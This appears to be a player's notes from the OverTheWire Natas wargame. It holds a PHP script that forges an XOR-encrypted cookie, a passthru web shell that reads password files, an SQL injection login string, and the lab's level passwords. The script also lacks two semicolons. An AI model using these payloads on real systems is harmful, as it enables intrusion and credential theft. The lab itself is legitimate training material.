
```
<?
function xor_encrypt($in) {
    $key = 'qw8J';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}


function xor_encrypt2($in1, $in2) {
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($in1);$i++) {
    $outText .= $in1[$i] ^ $in2[$i];
    }

    return $outText;
}
$var1 = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEl0vFBJdaAw=";
$var2 = "{\"showpassword\":\"no\",\"bgcolor\":\"#eeeeee\"}";
$var3 = "{\"showpassword\":\"yes\",\"bgcolor\":\"#eeeeee\"}"
echo xor_encrypt2(base64_decode($var1), $var2);
echo "\n\n"
echo base64_encode(xor_encrypt($var3));
?>
```

http://natas12.natas.labs.overthewire.org/
EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

<?echo passthru("cat /etc/natas_webpass/natas13")?>

http://natas13.natas.labs.overthewire.org/
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

<?echo passthru("cat /etc/natas_webpass/natas14")?>

http://natas14.natas.labs.overthewire.org/
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

id : 1
pw : "or"1"="1

http://natas15.natas.labs.overthewire.org/
AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

http://natas16.natas.labs.overthewire.org/
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

http://natas17.natas.labs.overthewire.org/
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
